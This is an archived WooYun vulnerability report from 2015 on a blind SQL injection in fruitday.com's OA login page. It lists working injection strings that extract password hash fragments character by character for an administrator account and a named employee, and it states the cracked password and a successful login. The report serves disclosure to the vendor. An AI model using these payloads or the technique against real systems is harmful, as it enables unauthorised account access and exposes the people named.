当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0132431

漏洞标题:天天果园某站存在SQL注入漏洞,可登陆任意人员账号

相关厂商:fruitday.com

漏洞作者: 浮萍

提交时间:2015-08-07 17:13

修复时间:2015-09-21 20:50

公开时间:2015-09-21 20:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-07: 细节已通知厂商并且等待厂商处理中
2015-08-07: 厂商已经确认,细节仅向厂商公开
2015-08-17: 细节向核心白帽子及相关领域专家公开
2015-08-27: 细节向普通白帽子公开
2015-09-06: 细节向实习白帽子公开
2015-09-21: 细节向公众公开

简要描述:

详细说明:

http://hq.fruitday.com:89/login.do
任意输入用户名时 提示用户未找到

Snap22.jpg


当用户名输入sysadmin时
提示密码不正确

Snap18.jpg


输入sysadmin' and /**/len(loginid)>0 and 'a'='a
同样提示密码不正确

Snap19.jpg


sysadmin' and /**/len(password)=32 and 'a'='a

Snap20.jpg


说明存在password字段 且长度为32
然后开始获取password内容

sysadmin' and (SUBSTRING(password,1,1)='s') and 'a'='a
sysadmin' and (SUBSTRING(password,1,1)='a') and 'a'='a
sysadmin' and (SUBSTRING(password,2,1)='a') and 'a'='a
sysadmin' and (SUBSTRING(password,3,1)='7') and 'a'='a
....


已知密码为md5加密
这里只取9-24位

sysadmin'%20and(substring(password,9,1)%3d'2')%20and%20'a'%3d'a
sysadmin'%20and(substring(password,10,1)%3d'c')%20and%20'a'%3d'a
sysadmin'%20and(substring(password,11,1)%3d'f')%20and%20'a'%3d'a
sysadmin'%20and(substring(password,12,1)%3d'c')%20and%20'a'%3d'a
sysadmin'%20and(substring(password,13,1)%3d'f')%20and%20'a'%3d'a
sysadmin'%20and(substring(password,14,1)%3d'9')%20and%20'a'%3d'a
sysadmin'%20and(substring(password,15,1)%3d'8')%20and%20'a'%3d'a
sysadmin'%20and(substring(password,16,1)%3d'4')%20and%20'a'%3d'a
sysadmin' and(substring(password,17,1)='d') and 'a'='a
sysadmin' and(substring(password,18,1)='3') and 'a'='a
sysadmin' and(substring(password,19,1)='9') and 'a'='a
sysadmin' and(substring(password,20,1)='0') and 'a'='a
sysadmin' and(substring(password,21,1)='a') and 'a'='a
sysadmin' and(substring(password,22,1)='a') and 'a'='a
sysadmin' and(substring(password,23,1)='2') and 'a'='a
sysadmin' and(substring(password,24,1)='b') and 'a'='a


sysadmin的密码加密后密文为

2cfcf984d390aa2b


sysadmin' and(substring(password,9,16)='2cfcf984d390aa2b') and 'a'='a


Snap21.jpg


漏洞证明:

根据 WooYun: 天天果园漏洞组合(OA+wifi+第三方渠道+RTX+企业QQ+SVN+宿舍网络) 可知
该oa系统的登录名为姓名
这里取一个人的名字作为用户名

章继宗


http://hq.fruitday.com:89/login.do?message=103&verify= 表示用户名未找到
http://hq.fruitday.com:89/login.do?message=102&verify= 表示密码错误

Snap23.jpg


Snap24.jpg


%E7%AB%A0%E7%BB%A7%E5%AE%97' and(substring(password,9,1)='a') and 'a'='a
%E7%AB%A0%E7%BB%A7%E5%AE%97' and(substring(password,10,1)='0') and 'a'='a
%E7%AB%A0%E7%BB%A7%E5%AE%97' and(substring(password,11,1)='b') and 'a'='a
%E7%AB%A0%E7%BB%A7%E5%AE%97' and(substring(password,12,1)='9') and 'a'='a
%E7%AB%A0%E7%BB%A7%E5%AE%97' and(substring(password,13,1)='2') and 'a'='a
%E7%AB%A0%E7%BB%A7%E5%AE%97' and(substring(password,14,1)='3') and 'a'='a
%E7%AB%A0%E7%BB%A7%E5%AE%97' and(substring(password,15,1)='8') and 'a'='a
%E7%AB%A0%E7%BB%A7%E5%AE%97' and(substring(password,16,1)='2') and 'a'='a
%E7%AB%A0%E7%BB%A7%E5%AE%97' and(substring(password,17,1)='0') and 'a'='a
%E7%AB%A0%E7%BB%A7%E5%AE%97' and(substring(password,18,1)='d') and 'a'='a
%E7%AB%A0%E7%BB%A7%E5%AE%97' and(substring(password,19,1)='c') and 'a'='a
%E7%AB%A0%E7%BB%A7%E5%AE%97' and(substring(password,20,1)='c') and 'a'='a
%E7%AB%A0%E7%BB%A7%E5%AE%97' and(substring(password,21,1)='5') and 'a'='a
%E7%AB%A0%E7%BB%A7%E5%AE%97' and(substring(password,22,1)='0') and 'a'='a
%E7%AB%A0%E7%BB%A7%E5%AE%97' and(substring(password,23,1)='9') and 'a'='a
%E7%AB%A0%E7%BB%A7%E5%AE%97' and(substring(password,24,1)='a') and 'a'='a


其密码对应的md5为a0b923820dcc509a
经解密 密码是1
登录提示

Snap25.jpg


修复方案:

版权声明:转载请注明来源 浮萍@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-08-07 20:48

厂商回复:

非常感谢您提供的信息,我们会尽快查实修复。

最新状态:

暂无